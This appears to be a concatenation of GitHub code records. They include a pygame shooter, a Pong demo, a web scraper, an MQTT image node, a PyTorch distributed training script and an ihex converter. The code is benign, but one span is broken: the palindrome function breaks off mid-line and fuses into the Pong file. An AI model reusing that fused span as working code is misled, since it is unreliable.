ens.x -= ens.vel + 50 \r\n ens.x1 -= ens.vel \r\n if ens.y1 < y:\r\n ens.y1 += ens.vel \r\n elif ens.y1 > y:\r\n ens.y1 -= ens.vel \r\n try:\r\n for bull in bulls:\r\n for ens in enemy:\r\n if bull.y >= ens.y1 and bull.y <= ens.y1 + 110:\r\n if bull.x > x:\r\n if bull.x >= ens.x1 and bull.x <= ens.x1 + 80:\r\n bulls.pop(bulls.index(bull))\r\n enemy.pop(enemy.index(ens))\r\n count -= 1\r\n score += 10\r\n else:\r\n if bull.x >= ens.x1 and bull.x <= ens.x1 + 80:\r\n bulls.pop(bulls.index(bull))\r\n enemy.pop(enemy.index(ens))\r\n count -= 1 \r\n score += 10\r\n \r\n except:\r\n pass\r\n try:\r\n for ens in enemy: \r\n if not (isJump):\r\n ax1, ay1, ax2, ay2 = [ens.x1, ens.y1, 40, 60]\r\n ax2 = ax1 + ax2\r\n ay2 = ay1 + ay2\r\n \r\n bx1, by1, bx2, by2 = [x, y, 40, 60]\r\n bx2 = bx1 + bx2\r\n by2 = by1 + by2\r\n \r\n s1 = ( ax1>=bx1 and ax1<=bx2 ) or ( ax2>=bx1 and ax2<=bx2 )\r\n s2 = ( ay1>=by1 and ay1<=by2 ) or ( ay2>=by1 and ay2<=by2 )\r\n s3 = ( bx1>=ax1 and bx1<=ax2 ) or ( bx2>=ax1 and bx2<=ax2 )\r\n s4 = ( by1>=ay1 and by1<=ay2 ) or ( by2>=ay1 and by2<=ay2 )\r\n if ((s1 and s2) or (s3 and s4)) or ((s1 and s4) or (s3 and s2)) :\r\n #pygame.mixer.music.stop()\r\n running = False\r\n dead = True \r\n except:\r\n pass\r\n\r\n if boss1:\r\n if S:\r\n pygame.mixer.music.load(bossM)\r\n pygame.mixer.music.set_volume(10)\r\n pygame.mixer.music.play(-1) \r\n S = False\r\n if not(bossD):\r\n if hardmod:\r\n C = random.randint(0, 20)\r\n else: \r\n C = 0\r\n if boss.x < x:\r\n \r\n if C ==1:\r\n boss.x += boss.vel + 60\r\n else:\r\n boss.x += boss.vel - 9\r\n elif boss.x > x:\r\n \r\n if C ==1:\r\n boss.x -= boss.vel + 60 \r\n else: \r\n boss.x -= boss.vel -9\r\n if boss.y < y:\r\n boss.y += boss.vel - 9\r\n elif boss.y > y:\r\n boss.y -= boss.vel - 9\r\n try:\r\n for bull in bulls:\r\n if bull.y >= boss.y and bull.y <= boss.y + 140:\r\n if bull.x > x:\r\n if bull.x >= boss.x and bull.x <= boss.x + 90:\r\n bulls.pop(bulls.index(bull))\r\n boss.heal -= 1\r\n else:\r\n if bull.x >= boss.x and bull.x <= boss.x + 90:\r\n bulls.pop(bulls.index(bull))\r\n boss.heal -= 1 \r\n except:\r\n pass \r\n if boss.heal <= 0 and not(hardmod):\r\n win1 = True \r\n bossD = True\r\n if hardmod:\r\n if boss.heal <= 0:\r\n hx, hy = boss.x, boss.y \r\n screen.blit(Hat, (hx, hy)) \r\n bossD = True\r\n ax1, ay1, ax2, ay2 = [hx, hy, 50, 50]\r\n ax2 = ax1 + ax2\r\n ay2 = ay1 + ay2\r\n \r\n bx1, by1, bx2, by2 = [x, y, 40, 60]\r\n bx2 = bx1 + bx2\r\n by2 = by1 + by2\r\n \r\n s1 = ( ax1>=bx1 and ax1<=bx2 ) or ( ax2>=bx1 and ax2<=bx2 )\r\n s2 = ( ay1>=by1 and ay1<=by2 ) or ( ay2>=by1 and ay2<=by2 )\r\n s3 = ( bx1>=ax1 and bx1<=ax2 ) or ( bx2>=ax1 and bx2<=ax2 )\r\n s4 = ( by1>=ay1 and by1<=ay2 ) or ( by2>=ay1 and by2<=ay2 )\r\n if ((s1 and s2) or (s3 and s4)) or ((s1 and s4) or (s3 and s2)) : \r\n win = True \r\n if win:\r\n screen.fill((0,0,0))\r\n font = pygame.font.Font(r'data\\prfiles\\13882.otf', 100)\r\n text1 = font.render(\"You won\",True, (255, 0, 0))\r\n text2 = font.render(\"Congrutilations!\",True, (255, 0, 0))\r\n screen.blit(text1, [360,150])\r\n screen.blit(text2, [240,250])\r\n if win1:\r\n screen.fill((0,0,0))\r\n font = pygame.font.Font(r'data\\prfiles\\13882.otf', 100)\r\n text1 = font.render(\"You won\",True, (255, 0, 0))\r\n text2 = font.render(\"Congrutilations!\",True, (255, 0, 0))\r\n font1 = pygame.font.Font(r'data\\prfiles\\13882.otf', 80)\r\n text3 = font1.render(\"Press H before boss for hardmod\",True, (255, 0, 0))\r\n screen.blit(text1, [360,150])\r\n screen.blit(text2, [240,250]) \r\n screen.blit(text3, [60,350]) \r\n \r\n if not(win):\r\n if not(bossD):\r\n if not (isJump):\r\n ax1, ay1, ax2, ay2 = [boss.x, boss.y, 90, 120]\r\n ax2 = ax1 + ax2\r\n ay2 = ay1 + ay2\r\n \r\n bx1, by1, bx2, by2 = [x, y, 40, 60]\r\n bx2 = bx1 + bx2\r\n by2 = by1 + by2\r\n \r\n s1 = ( ax1>=bx1 and ax1<=bx2 ) or ( ax2>=bx1 and ax2<=bx2 )\r\n s2 = ( ay1>=by1 and ay1<=by2 ) or ( ay2>=by1 and ay2<=by2 )\r\n s3 = ( bx1>=ax1 and bx1<=ax2 ) or ( bx2>=ax1 and bx2<=ax2 )\r\n s4 = ( by1>=ay1 and by1<=ay2 ) or ( by2>=ay1 and by2<=ay2 )\r\n if ((s1 and s2) or (s3 and s4)) or ((s1 and s4) or (s3 and s2)) : \r\n running = False\r\n dead = True \r\n if not(bossD):\r\n boss.draw()\r\n font = pygame.font.Font(None, 50)\r\n text = font.render(\"Score:\",True, (255, 0, 0))\r\n screen.blit(text, [0, 0]) \r\n font = pygame.font.Font(None, 50)\r\n text = font.render(str(score), True, (255, 0, 0))\r\n screen.blit(text, [120, 0]) \r\n if ok and okx <= 1500 and oky >= -300:\r\n okx += 10\r\n oky -= 10\r\n screen.blit(Ok, (okx, oky)) \r\n pygame.display.flip()\r\n \r\nwhile dead:\r\n pygame.display.flip()\r\n for event in pygame.event.get():\r\n if (event.type == pygame.QUIT):\r\n dead = False \r\n if boss:\r\n pygame.mixer.music.load(die[1])\r\n pygame.mixer.music.play() \r\n boss = False\r\n if S:\r\n pygame.mixer.music.load(die[0])\r\n pygame.mixer.music.play() \r\n S = False\r\n screen.fill((0,0,0))\r\n font = pygame.font.Font(r'data\\prfiles\\13882.otf', 120)\r\n text1 = font.render(\"Game Over\",True, (255, 0, 0))\r\n text2 = font.render(\"Your score: \" + str(score),True, (255, 0, 0))\r\n screen.blit(text1, [300,225])\r\n screen.blit(text2, [230,325])\r\npygame.quit()","repo_name":"mionitsa/DavArm","sub_path":"Davarm.py","file_name":"Davarm.py","file_ext":"py","file_size_in_byte":23792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21683235859","text":"def palindromeV3(ch):\n i=0\n l=len(ch)\n test=True\n while (i= 255 or counter <= 0:\r\n add *= -1\r\n\r\n PG.changeBallColour((255, counter, 50))\r\n PG.changeBackgroundColour((125, 50, counter))\r\n\r\n PG.drawStage()\r\n","repo_name":"RavenDuffy/Pong-Syllabus","sub_path":"PongGame.py","file_name":"PongGame.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30632451597","text":"# importing the requests library\nimport re\n\nimport requests\n\n# For production\nURL = \"https://principles.jackow98.site/Principles\"\n\n# For development\n# URL = \"http://localhost/Principles\"\n\ntopic = \"\"\nprinciple = \"\"\ntopicCount = 0\nparentPrincipleCount = 0\nchildPrincipleCount = 0\nidentifier = \"\"\n\ntopicPattern = re.compile(\"### (.*)\")\nparentPrinciplePattern = re.compile(\"- \\*\\*(.*)\\*\\*\")\nchildPrinciplePattern = re.compile(\"[0-9]*\\.\\s(.*)\")\n\nwith open('principles.md', 'r', encoding='utf8') as fin:\n\n for line in fin:\n strippedLine = line.strip().replace(\"’\", \"'\")\n\n topicMatch = topicPattern.match(strippedLine)\n parentMatch = parentPrinciplePattern.match(strippedLine)\n childMatch = childPrinciplePattern.match(strippedLine)\n\n if topicMatch:\n topic = topicMatch.group(1)\n topicCount += 1\n parentPrincipleCount = 0\n childPrincipleCount = 0\n\n if parentMatch:\n principle = parentMatch.group(1)\n parentPrincipleCount += 1\n childPrincipleCount = 0\n\n if childMatch:\n principle = childMatch.group(1)\n childPrincipleCount += 1\n\n if parentMatch or childMatch:\n identifier = f\"{topic}.{parentPrincipleCount}.{childPrincipleCount}\"\n data = {\n \"topic\": topic,\n \"id\": identifier,\n \"principleText\": principle\n }\n headers = {'charset=utf-8'}\n\n r = requests.post(url=URL, json=data)\n if r.status_code != 200:\n print(principle + \" - Not added\")\n\n # print(f\"{identifier}, {principle}\")\n principle = \"\"\n","repo_name":"jackow98/principles","sub_path":"uploadPrinciples.py","file_name":"uploadPrinciples.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11223488276","text":"__author__ = 'Tom'\n\nfrom distutils.core import setup\n\nsetup(\n name='pomodoro',\n version='0.1',\n author='Tom Martin',\n author_email='thomas.r.martin@gmail.com',\n packages=['pomodoro', 'pomodoro.test'],\n scripts=['bin/stowe-towels.py',],\n url='http://pypi.python.org/pypi/pomodoro/',\n license='LICENSE.txt',\n description='Command line pomodoro',\n long_description=open('README.txt').read(),\n install_requires=[\n # \"Django >= 1.1.1\",\n # \"caldav == 0.1.4\",\n ],\n)\n","repo_name":"twoflowers/pomodoro","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20031756088","text":"import requests\nfrom bs4 import BeautifulSoup as bs\n\nresponse = requests.get(\"https://book24.ru/product/ya-tvoy-desert-5493403/\")\n\ntext = response.text\n\nsoup = bs(text, 'html.parser')\n\nparams = soup.select(\".item-tab__chars-item\")\n\nfor param in params:\n lable = param.select_one(\".item-tab__chars-key\").text\n if lable == \"Автор:\":\n author_name = param.select_one(\".item-tab__chars-value a\")\n print(author_name['data-link'])\n print(f\"Автор: {author_name.text}. Url: \")\n break\n","repo_name":"MGDas/DjangoBook","sub_path":"tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42702035165","text":"import matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport math\n## new code\n\n\nroll = 2.6335\npitch = math.pi/2\nyaw = math.pi/3.24\n\n\nyawMatrix = np.matrix([\n[math.cos(yaw), -math.sin(yaw), 0],\n[math.sin(yaw), math.cos(yaw), 0],\n[0, 0, 1]\n])\n\npitchMatrix = np.matrix([\n[math.cos(pitch), 0, math.sin(pitch)],\n[0, 1, 0],\n[-math.sin(pitch), 0, math.cos(pitch)]\n])\n\nrollMatrix = np.matrix([\n[1, 0, 0],\n[0, math.cos(roll), -math.sin(roll)],\n[0, math.sin(roll), math.cos(roll)]\n])\n\nR = yawMatrix * pitchMatrix * rollMatrix\n\ntheta = math.acos(((R[0, 0] + R[1, 1] + R[2, 2]) - 1) / 2)\nmulti = 1 / (2 * math.sin(theta))\n\nrx = multi * (R[2, 1] - R[1, 2]) * theta\nry = multi * (R[0, 2] - R[2, 0]) * theta\nrz = multi * (R[1, 0] - R[0, 1]) * theta\n\n##\n\nu = math.cos(yaw) * math.cos(pitch)\nv = math.sin(yaw) * math.cos(pitch)\nw = math.sin(pitch)\nfig = plt.figure()\nax = fig.add_subplot(111, projection = '3d')\nax.quiver(0,0,0,u,v,w)\nax.set_xlim([0, 5])\nax.set_ylim([0, 5])\nax.set_zlim([0, 5])\nplt.show()\n\nsoa = np.array([0, 0, 1, rx, ry, rz])\nprint(rx,ry,rz)\nX = soa[0]\nY = soa[1]\nZ = soa[2]\nU = soa[3]\nV = soa[4]\nW = soa[5]\n# fig = plt.figure()\n# ax = fig.add_subplot(111, projection='3d')\n# ax.quiver(X, Y, Z, U, V, W)\n# ax.set_xlim([-1, 0.5])\n# ax.set_ylim([-1, 1.5])\n# ax.set_zlim([-1, 8])\n# plt.show()","repo_name":"levw-eats-tacos/GPS-IMU","sub_path":"BerryIMU/TestFiles (for reference)/testdata.py","file_name":"testdata.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70347980968","text":"import base64\nimport hashlib\nimport json\nimport os\nimport pathlib\nimport time\nfrom datetime import datetime\n\nfrom homie.node.node_base import Node_Base\nfrom homie.node.property.property_datetime import Property_DateTime\nfrom homie.node.property.property_string import Property_String\n\n\nclass Node_Image(Node_Base):\n \"\"\"The recent image taken by the camnode's camera\n\n scanner/camnode-hwaddr/recent-image/...\n scanner/camnode-hwaddr/recent-image/filename\n scanner/camnode-hwaddr/recent-image/datetime\n scanner/camnode-hwaddr/recent-image/file\n \"\"\"\n\n # image file storage directoy\n IMAGE_DIR = os.path.join(pathlib.Path.home(), 'images')\n\n def __init__(\n self,\n device,\n id=\"recent-image\",\n name=\"Recent Image\",\n type_=\"file\",\n retain=True,\n qos=1,\n ):\n\n super().__init__(device, id, name, type_, retain, qos)\n\n os.makedirs(Node_Image.IMAGE_DIR, mode=0o755, exist_ok=True)\n assert os.path.exists(Node_Image.IMAGE_DIR)\n\n self.device_name = device.name\n\n self.filename = Property_String(node=self, id='filename', name='Filename')\n self.datetime = Property_DateTime(\n node=self,\n id='datetime',\n name='File Date',\n data_format='%Y-%m-%dT%H:%M:%S.%f',\n value=datetime.fromisoformat('1970-01-01').strftime('%Y-%m-%dT%H:%M:%S.%f'),\n )\n\n file_meta = {}\n file_meta['encoding'] = {}\n file_meta['encoding']['name'] = 'file encoding'\n file_meta['encoding']['value'] = 'base64'\n file_meta['hashfunc'] = {}\n file_meta['hashfunc']['name'] = 'hashlib'\n file_meta['hashfunc']['value'] = 'blake2s'\n file_meta['jsonfiledata'] = {}\n file_meta['jsonfiledata']['name'] = 'json_var'\n file_meta['jsonfiledata']['value'] = 'b64file'\n file_meta['jsonfilehash'] = {}\n file_meta['jsonfilehash']['name'] = 'json_var'\n file_meta['jsonfilehash']['value'] = 'filehash'\n self.file = Property_String(node=self, id='file', name='File', meta=file_meta)\n\n self.add_property(self.filename)\n self.add_property(self.datetime)\n self.add_property(self.file)\n\n def __str__(self):\n return str(self.__class__.__name__)\n\n def new_filename(self):\n \"\"\"Format: date_hwaddr.png\"\"\"\n device_name = self.device_name\n now = datetime.now() # current date and time\n dt = now.strftime('%Y%m%d%H%M%S')\n return dt + '_' + device_name + '.png'\n\n def new_file(self):\n return os.path.join(Node_Image.IMAGE_DIR, self.new_filename())\n\n def update_recent_image(self, file):\n \"\"\"Refreshes the recent-image node\"\"\"\n imgfile = ImageFile(file)\n\n self.filename.value = imgfile.filename\n self.datetime.value = imgfile.mtime\n self.file.value = imgfile.json\n\n\nclass ImageFile(object):\n \"\"\"Represents all information about an image file\"\"\"\n\n def __init__(self, file):\n assert os.path.exists(file)\n self.file = file\n self.b64file = self.b64(file)\n self.hashfunc = 'blake2s'\n self.filehash = self.blake2s(file)\n\n @property\n def filename(self):\n return os.path.basename(self.file)\n\n @property\n def mtime(self):\n # modTimesinceEpoc = os.path.getmtime(self.file)\n # return time.strftime('%Y-%m-%dT%H:%M:%S.000', time.localtime(modTimesinceEpoc))\n modTime = datetime.fromtimestamp(os.stat(self.file).st_mtime)\n return modTime.strftime('%Y-%m-%dT%H:%M:%S.%f')\n\n @property\n def json(self):\n return json.dumps(self.__dict__)\n\n def b64(self, file):\n with open(file, 'rb') as f:\n b64string = base64.b64encode(f.read()).decode('ASCII')\n return b64string\n\n def blake2s(self, file):\n hash_blake2s = hashlib.blake2s()\n with open(file, 'rb') as f:\n for chunk in iter(lambda: f.read(4096), b''):\n hash_blake2s.update(chunk)\n return hash_blake2s.hexdigest()\n","repo_name":"cdeck3r/3DScanner","sub_path":"src/homie-nodes/homie-camnode/node_image.py","file_name":"node_image.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"39808364504","text":"import sys\nimport random\nimport os\nimport os.path as osp\n\nimport numpy as np\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.multiprocessing as mp\n\nsys.path.append('./')\n\nfrom sembm.core import get_arguments # noqa\nfrom sembm.apis import evaluate # noqa\nfrom sembm.datasets import get_num_classes, get_class_names, build_dataset # noqa\nfrom sembm.core import DistBaseTrainer, cfg, cfg_from_file, cfg_from_list # noqa\nfrom sembm.utils import ( # noqa\n Checkpointer, Writer, convert_model, is_enabled, is_main_process, reduce_dict, reduce, build_dataloader,\n init_process_group, LrScheduler)\n\n\nclass IterLoader:\n\n def __init__(self, dataloader):\n self._dataloader = dataloader\n self.iter_loader = iter(self._dataloader)\n self._epoch = 0\n\n @property\n def epoch(self):\n return self._epoch\n\n def __next__(self):\n try:\n data = next(self.iter_loader)\n except StopIteration:\n self._epoch += 1\n if hasattr(self._dataloader.sampler, 'set_epoch'):\n self._dataloader.sampler.set_epoch(self._epoch)\n self.iter_loader = iter(self._dataloader)\n data = next(self.iter_loader)\n\n return data\n\n def __len__(self):\n return len(self._dataloader)\n\n\nclass Trainer(DistBaseTrainer):\n\n def __init__(self, cfg, model, optim, lr_sche, train_loader, val_loader, writer, checkpointer, **kwargs):\n super(Trainer, self).__init__(cfg, model, optim, lr_sche, train_loader, val_loader, writer, checkpointer,\n **kwargs)\n\n self.nclass = get_num_classes(cfg.DATASET.NAME)\n self.classNames = get_class_names(cfg.DATASET.NAME)\n assert self.nclass == len(self.classNames)\n\n self.start_epoch = self.checkpointer.start_epoch\n self.start_iter = self.checkpointer.start_iter\n self.best_score = self.checkpointer.best_score\n\n self.eval_period = cfg.TRAIN.EVAL_PERIOD\n self._iter = self.start_iter\n self._epoch = self.start_epoch\n\n def train_epoch(self, epoch):\n assert self._epoch == epoch\n self.model.train()\n\n PRETRAIN = self._epoch <= cfg.TRAIN.PRETRAIN\n self.writer.update_data_timepoint()\n for dataset_dict in self.train_loader:\n self.writer.update_forward_timepoint()\n # to cuda\n for k in dataset_dict.keys():\n if isinstance(dataset_dict[k], torch.Tensor):\n dataset_dict[k] = dataset_dict[k].cuda()\n\n # forward\n dataset_dict['PRETRAIN'] = PRETRAIN\n output = self.model(dataset_dict)\n losses = {k: v.mean() for k, v in output.items() if k.startswith('loss')}\n loss = sum(losses.values())\n\n self.writer.update_backward_timepoint()\n # backward\n self.optim.zero_grad()\n loss.backward()\n self.optim.step()\n\n self.lr_sche.adjust_learning_rate(self._epoch, self._iter)\n\n self.writer.update_data_timepoint()\n # log\n loss = reduce(loss)\n losses = reduce_dict(losses)\n if is_main_process():\n log_losses = {k: v.item() for k, v in losses.items() if k.startswith('loss')}\n log_losses['total_loss'] = loss.item()\n self.writer._iter_log_losses(log_losses, self.optim.param_groups[0]['lr'], self._epoch, self._iter)\n self._iter += 1\n\n self._epoch += 1\n\n def train_iter(self, iter, iter_loader):\n assert self._iter == iter\n self.model.train()\n\n PRETRAIN = self._epoch <= cfg.TRAIN.PRETRAIN\n self.writer.update_data_timepoint()\n dataset_dict = next(iter_loader)\n self.writer.update_forward_timepoint()\n # to cuda\n for k in dataset_dict.keys():\n if isinstance(dataset_dict[k], torch.Tensor):\n dataset_dict[k] = dataset_dict[k].cuda()\n\n # forward\n dataset_dict['PRETRAIN'] = PRETRAIN\n output = self.model(dataset_dict)\n losses = {k: v.mean() for k, v in output.items() if k.startswith('loss')}\n loss = sum(losses.values())\n\n self.writer.update_backward_timepoint()\n # backward\n self.optim.zero_grad()\n loss.backward()\n self.optim.step()\n\n self.lr_sche.adjust_learning_rate(self._epoch, self._iter)\n\n self.writer.update_data_timepoint()\n # log\n loss = reduce(loss)\n losses = reduce_dict(losses)\n if is_main_process():\n log_losses = {k: v.item() for k, v in losses.items() if k.startswith('loss')}\n log_losses['total_loss'] = loss.item()\n self.writer._iter_log_losses(log_losses, self.optim.param_groups[0]['lr'], self._epoch, self._iter)\n\n self._epoch = iter_loader.epoch + 1\n self._iter += 1\n\n def validation(self, epoch, iter, checkpoint=False):\n self.model.eval()\n IoU_dict = {}\n for key in ['cam']:\n with torch.no_grad():\n IoU = evaluate(self.model, self.val_loader, False)\n IoU_dict[key] = IoU\n\n self.writer._log_eval(self.classNames, IoU_dict, epoch, iter)\n if checkpoint:\n self.checkpointer.checkpoint(epoch, iter, np.mean(IoU_dict['cam']))\n\n def train_epochwise(self):\n for epoch in range(self.start_epoch, cfg.TRAIN.NUM_EPOCHS + 1):\n # shuffle\n if hasattr(self.train_loader.sampler, 'set_epoch'):\n self.train_loader.sampler.set_epoch(epoch)\n\n self.train_epoch(epoch)\n\n with torch.no_grad():\n self.validation(epoch, self._iter - 1, True)\n\n self.writer.close()\n\n def train_iterwise(self):\n iter_loader = IterLoader(self.train_loader)\n for iter in range(self.start_iter, cfg.TRAIN.NUM_ITERS + 1):\n self.train_iter(iter, iter_loader)\n\n if iter % self.eval_period == 0:\n with torch.no_grad():\n self.validation(self._epoch, iter, True)\n\n\ndef main_worker(rank, num_gpus, args):\n if args.seed is not None:\n random.seed(args.seed)\n torch.manual_seed(args.seed)\n np.random.seed(args.seed)\n cudnn.deterministic = True\n\n init_process_group('nccl', num_gpus, rank)\n\n if args.work_dir is None:\n cfg_name = osp.splitext(osp.basename(args.cfg_file))[0]\n dir_name = osp.split(osp.dirname(args.cfg_file))[1]\n cfg.WORK_DIR = osp.join('work_dirs', dir_name, cfg_name)\n else:\n cfg.WORK_DIR = args.work_dir\n\n if is_main_process():\n if not osp.exists(cfg.WORK_DIR):\n os.makedirs(cfg.WORK_DIR, 0o775)\n\n # Reading the config\n cfg_from_file(args.cfg_file)\n if args.set_cfgs is not None:\n cfg_from_list(args.set_cfgs)\n\n train_dataset = build_dataset(cfg, cfg.DATASET.TRAIN_SPLIT, test_mode=False)\n val_dataset = build_dataset(cfg, 'val', test_mode=True)\n\n train_loader = build_dataloader(\n train_dataset,\n batch_size=cfg.TRAIN.BATCH_SIZE,\n shuffle=True,\n drop_last=True,\n pin_memory=True,\n num_workers=cfg.TRAIN.NUM_WORKERS)\n\n val_loader = build_dataloader(\n val_dataset,\n batch_size=num_gpus,\n shuffle=False,\n drop_last=False,\n pin_memory=True,\n num_workers=cfg.TRAIN.NUM_WORKERS)\n\n if is_enabled():\n cfg.NET.BN_TYPE = 'syncbn'\n\n model = Trainer.build_model(cfg)\n kwargs = {\n \"base_lr\": cfg.TRAIN.LR,\n \"wd\": cfg.TRAIN.WEIGHT_DECAY,\n \"batch_size\": cfg.TRAIN.BATCH_SIZE,\n \"world_size\": num_gpus,\n }\n param_groups = model.parameter_groups(**kwargs)\n optim = Trainer.build_optim(param_groups, cfg.TRAIN)\n max_epochs = cfg.TRAIN.NUM_EPOCHS\n max_iters = cfg.TRAIN.NUM_EPOCHS * len(train_dataset) // cfg.TRAIN.BATCH_SIZE\n lr_sche = LrScheduler(cfg, max_epochs, max_iters, optim)\n\n checkpointer = Checkpointer(cfg.WORK_DIR, max_n=3)\n checkpointer.add_model(model, optim)\n\n writer = Writer(cfg.WORK_DIR)\n writer._build_writers()\n\n if args.resume is not None:\n checkpointer.load(args.resume)\n\n # to ddp model\n model = convert_model(model, find_unused_parameters=True)\n\n trainer = Trainer(cfg, model, optim, lr_sche, train_loader, val_loader, writer, checkpointer)\n if is_main_process():\n trainer.writer.logger_writer.info(model)\n trainer.writer.logger_writer.info(\"Config: \")\n trainer.writer.logger_writer.info(cfg)\n if cfg.TRAIN.MODE == 'iter':\n trainer.train_iterwise()\n elif cfg.TRAIN.MODE == 'epoch':\n trainer.train_epochwise()\n\n\ndef main():\n args = get_arguments(sys.argv[1:])\n\n num_gpus = args.num_gpus\n\n if num_gpus > 1:\n # Use torch.multiprocessing.spawn to launch distributed processes: the\n # main_worker process function\n os.environ['MASTER_ADDR'] = 'localhost'\n os.environ['MASTER_PORT'] = args.port\n mp.spawn(main_worker, nprocs=num_gpus, args=(num_gpus, args))\n else:\n # Simply call main_worker function\n main_worker(0, num_gpus, args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sennnnn/semseg_benchmark","sub_path":"tools/dist_train.py","file_name":"dist_train.py","file_ext":"py","file_size_in_byte":9218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17887707729","text":"import tkinter.messagebox as messagebox\nimport xlrd\n\nfrom xml.etree import ElementTree as ET\nfrom xml.dom.minidom import parse\n\ndef xls_xml(file_path,file_name):\n def read(file):\n try:\n data = xlrd.open_workbook(file)\n return data\n except IndentationError:\n print(\"读取失败\")\n def writexml(data):\n\n index = 0\n names = locals()\n nrowsName = locals()\n Block = ET.Element(\"std_no\")\n Block.text= file_name\n\n xx=0\n for block in data.sheet_names():\n nameB = block\n sheet = data.sheet_by_index(index)\n index =index +1\n names['block%d ' %index] = ET.SubElement(Block ,nameB)\n if xx==0:\n e1=ET.SubElement(Block,\"text_table\")\n e1.text = \"\"\n e=e1\n elif xx==1:\n e2=ET.SubElement(Block,\"compute_table\")\n e2.text = \"\"\n e=e2\n else:\n e3=ET.SubElement(Block,\"byte_table\")\n e3.text = \"\"\n e=e3\n pass\n xx+=1\n\n\n\n nrows = sheet.nrows\n nclos = sheet.ncols\n flag = 0\n\n for i in range(nrows):\n\n if flag!=0 and flag!=1:\n if xx == 1:\n nrowsName[\"nrow%d\".format(i)] = ET.SubElement(e ,'text_block')\n elif xx == 2:\n nrowsName[\"nrow%d\".format(i)] = ET.SubElement(e ,'func_block')\n elif xx == 3:\n nrowsName[\"nrow%d\".format(i)] = ET.SubElement(e ,'byte_block')\n index1 = 0\n\n\n for j in range(nclos):\n nn= ET.SubElement(nrowsName[\"nrow%d\".format(i)], str(sheet.cell(1, j).value))\n str0=str(sheet.cell(i, j).value)\n\n if str0 is \"\":\n str0 = \"null\"\n\n if str(str0[-2:]) == '.0':\n str0 = str(str0[:-2])\n else:\n str0 = str(str0)\n # if index1==0 or index1==1:\n # try:\n # str0 = str(int(float(str0)))\n # except:\n #\n # str0=str0\n # pass\n\n\n\n index1 += 1\n nn.text = str0\n\n flag+=1\n\n\n tree = ET.ElementTree(Block)\n\n tree.write(\"xx01.xml\", encoding=\"utf-8\")\n\n\n def build_sitemap():\n urlset = ET.Element(\"牛皮\") # 设置一个根节点,标签为urlset\n url = ET.SubElement(urlset, \"牛\") # 在根节点urlset下建立子节点\n loc = ET.SubElement(url, '二牛')\n loc.text = \"百度\"\n lastmod = ET.SubElement(url, \"三牛\")\n lastmod.text = \"2017-10-10\"\n changefreq = ET.SubElement(url, \"死牛\")\n changefreq.text = \"daily\"\n priority = ET.SubElement(url, \"五牛\")\n priority.text = \"1.0\"\n tree = ET.ElementTree(urlset)\n tree.write(\"sitemap.xml\", encoding=\"utf-8\")\n\n pass\n\n\n def prettyXml(element, indent, newline, level=0): # elemnt为传进来的Elment类,参数indent用于缩进,newline用于换行\n if element: # 判断element是否有子元素\n if element.text == None or element.text.isspace(): # 如果element的text没有内容\n element.text = newline + indent * (level + 1)\n else:\n element.text = newline + indent * (level + 1) + element.text.strip() + newline + indent * (level + 1)\n # else: # 此处两行如果把注释去掉,Element的text也会另起一行\n # element.text = newline + indent * (level + 1) + element.text.strip() + newline + indent * level\n temp = list(element) # 将elemnt转成list\n for subelement in temp:\n if temp.index(subelement) < (len(temp) - 1): # 如果不是list的最后一个元素,说明下一个行是同级别元素的起始,缩进应一致\n subelement.tail = newline + indent * (level + 1)\n else: # 如果是list的最后一个元素, 说明下一行是母元素的结束,缩进应该少一个\n subelement.tail = newline + indent * level\n prettyXml(subelement, indent, newline, level=level + 1) # 对子元素进行递归操作\n\n\n # X.xlsx表名字\n data = read(file_path)\n # print(len(data.sheet_names()))\n #\n\n #\n # sheet1 = data.sheet_by_index(1)\n #\n # nrows = sheet1.nrows\n # ncols = sheet1.ncols\n # for i in range(0,nrows):\n # for j in range(0,ncols):\n # sheet1R = sheet1.cell(0,j).value\n # print(sheet1R)\n writexml(data)\n\n tree = ET.parse(\"xx01.xml\")\n root = tree.getroot()\n for delete_node in root.findall('文字表'):\n print(delete_node)\n root.remove(delete_node)\n for delete_node in root.findall('计算表'):\n root.remove(delete_node)\n for delete_node in root.findall('标记示例表'):\n root.remove(delete_node)\n tree.write(\"xx01.xml\",encoding='utf-8')\n doc = parse(\"xx01.xml\")\n f = open(file_name+'.xml', 'w' ,encoding='utf-8')\n doc.writexml(f, addindent=' ', newl='\\n', encoding='utf-8')\n f.close()\n messagebox.showinfo('Message', '完成')","repo_name":"weruuu/Program","sub_path":"Python/File_Trans/XLS_XML.py","file_name":"XLS_XML.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9730538385","text":"#!/usr/bin/python3\n'''\nconverts riscv binary file to ihex format\n3 Jun 2022 - initial file. btko\n'''\nimport sys\n\t\t\t\ndef twos_comp(val, bits):\n\treturn((val ^ 2**bits-1) + 1)\n\n\t\ndef checksumit(bytecount, address, recordtype, data):\n\tsum = 0\n\tvalue = data\n\tvalue += recordtype << (4*8)\n\tvalue += address << (5*8)\n\tvalue += bytecount << (7*8)\n\t\n\tfor i in range(8):\n\t\tsum += (0xff & (value >> (8*i)))\n\tsum = sum & 0xff\n\treturn f\":{value:0{16}X}{twos_comp(sum, 